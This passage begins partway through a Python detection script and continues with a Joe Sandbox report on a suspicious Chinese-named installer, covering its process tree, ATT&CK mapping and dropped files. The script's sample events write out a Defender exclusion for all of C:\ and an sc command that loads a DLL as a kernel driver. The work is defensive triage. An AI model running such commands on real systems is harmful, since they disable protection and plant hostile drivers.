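    toks = tokenize(cmdline)
    if len(toks) < 3 or toks[0].lower().rsplit("\\", 1)[-1] not in ("sc", "sc.exe"):
        return []
    if toks[1].lower() != "create":
        return []
    name, opts, rest = toks[2], {}, toks[3:]
    for i, tok in enumerate(rest):
        if tok.endswith("=") and i + 1 < len(rest):  # sc's "key= value" syntax
            opts[tok[:-1].lower()] = rest[i + 1]
    svc_type = opts.get("type", "own").lower()      # sc defaults: type= own, start= demand
    image, start = opts.get("binpath", ""), opts.get("start", "demand")
    if svc_type != "kernel":
        return [Finding("service_create", "low", f"{name}: type={svc_type} start={start} binPath={image!r}")]
    detail = f"{name}: kernel driver from {image!r}, start={start}"
    if image.lower().endswith(".sys"):
        return [Finding("kernel_driver_service", "high", detail)]
    return [Finding("kernel_driver_service", "critical", detail + " (driver image has no .sys extension)")]


def check_nt_info_class(api: str, args: list[int]) -> list[Finding]:
    """Decode the second argument of NtSet/QueryInformation{Thread,Process} calls."""
    if len(args) < 2:
        return []
    cls = args[1]
    if api == "NtSetInformationThread" and cls in THREAD_INFO_CLASSES:
        return [Finding("anti_debug", "high", f"{api} class 0x{cls:02X} = {THREAD_INFO_CLASSES[cls]}")]
    if api in ("NtQueryInformationProcess", "NtSetInformationProcess") and cls in PROCESS_INFO_CLASSES:
        rule = "critical_process" if cls == 0x1D else "anti_debug"
        return [Finding(rule, "high", f"{api} class 0x{cls:02X} = {PROCESS_INFO_CLASSES[cls]}")]
    return []


def triage(events: list[dict]) -> list[Finding]:
    """Run every rule over {'kind': 'process', 'cmdline': ...} and {'kind': 'api', ...} events."""
    findings: list[Finding] = []
    for ev in events:
        if ev["kind"] == "process":
            findings += check_defender_exclusion(ev["cmdline"]) + check_sc_create(ev["cmdline"])
        elif ev["kind"] == "api":
            findings += check_nt_info_class(ev["api"], ev["args"])
    return findings


# Constructed from the report rows. Joe's argument dump "00000000,00000011,..." is hex,
# so the NtSetInformationThread class is 0x11.
SAMPLE_EVENTS = [
    {"kind": "process", "cmdline": '"powershell.exe" -Command "Add-MpPreference -ExclusionPath \'C:\\\'"'},
    {"kind": "process", "cmdline": r'sc create CleverSoar displayname= CleverSoar binPath= '
                                   r'"C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto'},
    {"kind": "process", "cmdline": "sc start CleverSoar"},
    {"kind": "api", "api": "NtSetInformationThread", "args": [0x0, 0x11, 0x0, 0x0]},
    {"kind": "api", "api": "NtQueryInformationProcess", "args": [0xFFFFFFFF, 0x07, 0x0, 0x4, 0x0]},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity:>8}] {f.rule:<22} {f.detail}")
```

Two caveats the rows themselves do not settle. sc.exe will register a kernel service for any path; on x64 Windows the image is only loaded if Driver Signature Enforcement accepts its signature, so whether `sc start CleverSoar` succeeded cannot be read from the process-creation rows (32 repeated starts look like a retry loop, but the report does not record the result). The exclusion rule also fires on `Set-MpPreference`, which replaces the list rather than appending to it, and on -ExclusionProcess / -ExclusionExtension, neither of which this report shows.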
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CB35720 cpuid 6_2_6CB35720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0038AB2A GetSystemTimeAsFileTime, 10_2_0038AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00420090 GetVersion, 10_2_00420090
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1920433392.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
MITRE ATT&CK matrix, techniques with signature hits (badge digits as rendered in the report; the remaining cells of the matrix template carried no hits)

Tactic                  Technique                                  Badges
Execution               Command and Scripting Interpreter          2
Execution               Service Execution                          1
Execution               Native API                                 1
Persistence             Windows Service                            1
Persistence             DLL Side-Loading                           1
Privilege Escalation    Access Token Manipulation                  1
Privilege Escalation    Windows Service                            1
Privilege Escalation    Process Injection                          111
Privilege Escalation    DLL Side-Loading                           1
Defense Evasion         Masquerading                               11
Defense Evasion         Disable or Modify Tools                    1
Defense Evasion         Virtualization/Sandbox Evasion             231
Defense Evasion         Access Token Manipulation                  1
Defense Evasion         Process Injection                          111
Defense Evasion         Deobfuscate/Decode Files or Information    1
Defense Evasion         Obfuscated Files or Information            3
Defense Evasion         Software Packing                           1
Defense Evasion         DLL Side-Loading                           1
Discovery               System Time Discovery                      1
Discovery               Security Software Discovery                331
Discovery               Virtualization/Sandbox Evasion             231
Discovery               Process Discovery                          2
Discovery               Application Window Discovery               1
Discovery               System Owner/User Discovery                2
Discovery               File and Directory Discovery               3
Discovery               System Information Discovery               25
Collection              Archive Collected Data                     1
Command and Control     Encrypted Channel                          1
Impact                  System Shutdown/Reboot                     1
Behavior Graph ID: 1579419 | Sample: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Start date: 22/12/2024 | Architecture: WINDOWS | Score: 80

Sample-level signatures:
  Found driver which could be used to inject code into processes
  PE file contains section with special chars
  AI detected suspicious sample
  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree (reconstructed from the behavior graph; the graph image is not part of this text):
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
  dropped: #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp (PE32)
  +- #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
       dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
       signature: Adds a directory exclusion to Windows Defender
       +- powershell.exe
       |    signature: Loading BitLocker PowerShell Module
       |    +- conhost.exe
       |    +- WmiPrvSE.exe
       +- #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
            dropped: #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp (PE32)
            +- #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                 dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Program Files (x86)\...\updat4.vac (PE32); 3 other files (none is malicious)
                 signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
                 +- 7zr.exe
                 |    dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
                 |    +- conhost.exe
                 +- 7zr.exe
                      +- conhost.exe
cmd.exe
  +- sc.exe
       +- conhost.exe
cmd.exe
  +- sc.exe
       +- conhost.exe
32 other processes (cmd.exe instances)
  +- sc.exe (3 shown) and 28 other processes, each followed by conhost.exe

Antivirus detection, initial sample

Source                                                  Detection   Scanner
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe    6%          Virustotal
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe    0%          ReversingLabs

Antivirus detection, dropped files

Source                                                                                                   Detection   Scanner
C:\Program Files (x86)\Windows NT\7zr.exe                                                                0%          ReversingLabs
C:\Program Files (x86)\Windows NT\is-7F262.tmp                                                           0%          ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll                                                           3%          ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)                                                           0%          ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp       0%          ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmp                                       0%          ReversingLabs
C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmp                                       0%          ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp       0%          ReversingLabs
No antivirus matches for unpacked PE files, domains or URLs
No contacted domains info
URLs found in memory or dropped files (Name / Source / Malicious / Reputation; no antivirus detection for any entry)

Name: https://aria2.github.io/Usage:
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr
Malicious: false | Reputation: unknown

Name: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Malicious: false | Reputation: high

Name: https://github.com/aria2/aria2/issuesReport
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr
Malicious: false | Reputation: high

Name: http://www.metalinker.org/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr
Malicious: false | Reputation: unknown

Name: https://www.remobjects.com/ps
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr
Malicious: false | Reputation: high

Name: https://aria2.github.io/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr
Malicious: false | Reputation: unknown

Name: https://github.com/aria2/aria2/issues
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr
Malicious: false | Reputation: high

Name: https://www.innosetup.com/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr
Malicious: false | Reputation: high

Name: http://www.metalinker.org/basic_string::_M_construct
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr
Malicious: false | Reputation: unknown
                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579419
Start date and time: 2024-12-22 09:34:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 112
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (renamed because the original name is a hash value)
Original Sample Name: _1.0.4.exe
Detection: MAL
Classification: mal80.evad.winEXE@146/32@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 121
• Number of non-executed functions: 108
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time       Type               Description
03:35:03   API Interceptor    18x Sleep call for process: powershell.exe modified
No IP, domain, ASN or JA3 fingerprint context
Dropped file context (Joe Sandbox View)
Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated Sample Name / URL: ekTL8jTI4D.msi
Detection: malicious
Threat Name: Unknown
Process: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: ekTL8jTI4D.msi, Detection: malicious
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
File Type: data
Category: dropped
Size (bytes): 249968
Entropy (8bit): 7.999303164107087
Encrypted: true
SSDEEP: 6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
MD5: 2362DBE94C48B5F9BEC71C9C0A2AB15A
SHA1: B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
SHA-256: D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
SHA-512: 7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
Malicious: false
                      Preview:.@S.....?..,................H..v\t4..{@.Ae.RIm...w..8Q.........G..W..7..x.mX.-....Yg..x.2"l..,...yFP;...D?b.......m...!(M.Y..5.*qk..3.j.U.2......!i..$.s.I.W..i.......zQ....X..E*o.I.._..>"...O.@....S8..L1X.P....3_.C.,H`.........zmp ...x..........4_...E.`X{7.T.@e.1.>...v. .......u8.;...z...w...n.....v*.....o%...v.N](....P..2...z..G.r.^.;U/...kN....1tEn.i..F....q.u..y[.....B..%C.S3..X....B....&H.e....o.T..{...=.+6uq._..y.....i.7.%"w#...I...k.n.5..r.'l....u.......m.M.v.6.}.....U.*Jp<.}.?k... .$.*./.f!R......N....Sr......ys..&....m...'PG.:c...*f.7.....v.j.'.4.'W..$.F.g......LV...FL!!4.$QG.K..v..SZv.....{a..,u.%..{9....~MR.>..e.<.......20..GI.........x..IB.n5..C.G....@w..a......[.R.a.Y Np."........*.b...m..4P...1C...M....*.{>^..e...-c..N.BS.e...*.Wr.a._......V.Y..D.l..<;.HZ'.\.../..G.i.=......*..k...h..j.....r.%+!.V...p.vgQf....Z*.h<.Q[~g..}^.iH]..........J.<....<K.G.(.C....`....ry.....v..Wu>....r1u..ZA.".d..LAQ.F..._...#..Y&.....~.J...
Process: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
File Type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 5649408
Entropy (8bit): 6.392614480390128
Encrypted: false
SSDEEP: 98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5: 8C71B86BF407C05BAF11E8D296B9C8B8
SHA1: 6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256: BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512: BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
File Type: data
Category: dropped
Size (bytes): 249968
Entropy (8bit): 7.999303164107087
Encrypted: true
SSDEEP: 6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
MD5: 2362DBE94C48B5F9BEC71C9C0A2AB15A
SHA1: B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
SHA-256: D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
SHA-512: 7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
Malicious: false
                      Preview:.@S.....?..,................H..v\t4..{@.Ae.RIm...w..8Q.........G..W..7..x.mX.-....Yg..x.2"l..,...yFP;...D?b.......m...!(M.Y..5.*qk..3.j.U.2......!i..$.s.I.W..i.......zQ....X..E*o.I.._..>"...O.@....S8..L1X.P....3_.C.,H`.........zmp ...x..........4_...E.`X{7.T.@e.1.>...v. .......u8.;...z...w...n.....v*.....o%...v.N](....P..2...z..G.r.^.;U/...kN....1tEn.i..F....q.u..y[.....B..%C.S3..X....B....&H.e....o.T..{...=.+6uq._..y.....i.7.%"w#...I...k.n.5..r.'l....u.......m.M.v.6.}.....U.*Jp<.}.?k... .$.*./.f!R......N....Sr......ys..&....m...'PG.:c...*f.7.....v.j.'.4.'W..$.F.g......LV...FL!!4.$QG.K..v..SZv.....{a..,u.%..{9....~MR.>..e.<.......20..GI.........x..IB.n5..C.G....@w..a......[.R.a.Y Np."........*.b...m..4P...1C...M....*.{>^..e...-c..N.BS.e...*.Wr.a._......V.Y..D.l..<;.HZ'.\.../..G.i.=......*..k...h..j.....r.%+!.V...p.vgQf....Z*.h<.Q[~g..}^.iH]..........J.<....<K.G.(.C....`....ry.....v..Wu>....r1u..ZA.".d..LAQ.F..._...#..Y&.....~.J...
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):56530
                      Entropy (8bit):7.996846847347508
                      Encrypted:true
                      SSDEEP:1536:d3d+5x5q0iGMxg8m/iN5a2Sb+R+VgNf3Teh3k:dU5ZihSwXLRtCtk
                      MD5:406F89570AF6C412A867A8E4D82B6153
                      SHA1:8BE8D777BFB0D3FD74A143A243F87BBD647B4A0E
                      SHA-256:D5C6788AA1BA538E77DD1C26191FE9F3E9C78C080A85D903F7FD886D5ABAD25F
                      SHA-512:105181CC03B9E640164ABE7F55329F40D683540AD717501E3C5DEA283773275C3DF7D812BB888CCB10864402DB87AD1ABE9BACAC3B31C5FCF41769D769165D8A
                      Malicious:false
                      Preview:.@S.......@| ..............].!..........#Rk0cc..J...i.W.4.".....A..8c..........D..aB?....W..&....EA...z7...d_..M..%..Po..f*0n.t...IM....c.Y.D.].3W9Q...I..B..q]...'n....d%K.x..).A..l'...o..k.cR..i".X...`....R5a.....bE..U.m.U....j.(.O.a..........F"s:#Cd..SP..h1..,..X.T(...ZZ.0fn..V..:.;.....M{.GLm.o....L...sp..p...m.[.Q.....->9.m...{.UZ...p....f.;.l....G=....]....*.j.D.|yV.....2l.......^.o.|..R6.|%Hz.Xawu+..U.2.c../...C.`.O...f.......o.....5V.wB..S5..4p..2.;..q..f.Yb..d..=2.s..:....L.X..(B..F.6.am.j...P.c...*4.O.Z ...M,.!tX....=q...x.n>.C..<..8......]..".x..c.=>.l......t...(. .,......J,.Z..\.w{M..`....Z....p.6..VD..@v..G..S$K+.MLT.*eo.g.A...-.nPZ..lU9(Y....Kn..A...WvfD...*<%......8!..Q..%^"..)>XX..*A..*...$...YbE....@.C*.>.l.....;..@G._.l.-.L.x.q..n\.r_.M....YD..`x.>|....g ...J....q^.'.B@.i..0.Kq.W.........P....>.>.84.o.7z....0.8.h$b......0.D....%.*.....w..JR.7...............NJ;.......pP...|[E...4...A....x..h.T.)h+..8,G..&..k.@..y-.}..o
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):56530
                      Entropy (8bit):7.996846847347513
                      Encrypted:true
                      SSDEEP:768:nJuAKIP8alGZ+u/rCpvHZIUA3xWysFN7PyhuhvbBEx7+b4TkXSycsQEnMpVb+9wm:nJuAz8rQq0vHZxO2ZMa4TxxcMpBofv
                      MD5:49B76BC1C12C1594EFAFA82A76F434A9
                      SHA1:1282B1609F0635D38D91AD3E3472FD3EAFE87703
                      SHA-256:3AEF2C31530F1EB8D4205F025C231D1B841B7D1368C1F00DDEECA329A94DAD22
                      SHA-512:09FF6AFC4E9CD9002ECCF66A02675FC5485B0D23E00B9DB5AF5BB976295DCA78D8D7C959628C4FFAE0D577A354D2B0C0E101C61A27D4C6DEACEE36DF3C8F05C6
                      Malicious:false
                      Preview:7z..'.....C.........2..........oJ...>*.......^5."?<.l.,.r.Xed6G..!G[.]k]KR.lF...},...dm.L.k..e^.3...<H../.9...3.].K......B....x.....J.5.`.H.![.7..4.w.j..6-A...F..u.*...n..;.".'>_...8]G.Tm.5..-.....4.c.)b.$wM..F..}...e\.H.G.J.B...T.K.$...b.K.}2~.........}...u..5*.6LP.3..Ou*..U....ZK...4.iGP.......wS..4@.....<..^...%fd.u..S.z.g.......X..\.x.fX..H......a(..S:...Mo..f. .......M..%~[.R%.=Pv.Y.P.MK..G.......V.X........n.8.8...C|..$...4.P.Z..PQ.)..4$n..g..J7....W..|U.h.....G...p.P..!.Hv...4PC.y..,.I..5.hv(E.^..;...0.:...5`w.....Fm}|..}.'.....6.......jBfJNJ.G..*\.Kd.4...".z..H.AL~.c...%)i.$.|..0.l...........M....9.C..O..^ ..2Kf..H...k...V....$...'.l...H}....TZ2....H..v37...........$..y....n......R...d..\...6..-..l....4.._..J.+.CwZ...0...8.#.t...E.*..v.....i.9.6...H'....L.17...CT...M.......o..xk.Y..U..wrzX.ceh5/.v...m...T..?K...Z(;.U...*...YX..f$.~.d).....fd....9.W..&...}M!dTy{`\x.......oE;..2_j.k.....P.w.Og..)C.IW.8?s.q....PC..C..p(.......s....
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):56546
                      Entropy (8bit):7.996966859255975
                      Encrypted:true
                      SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                      MD5:CEA69F993E1CE0FB945A98BF37A66546
                      SHA1:7114365265F041DA904574D1F5876544506F89BA
                      SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                      SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                      Malicious:false
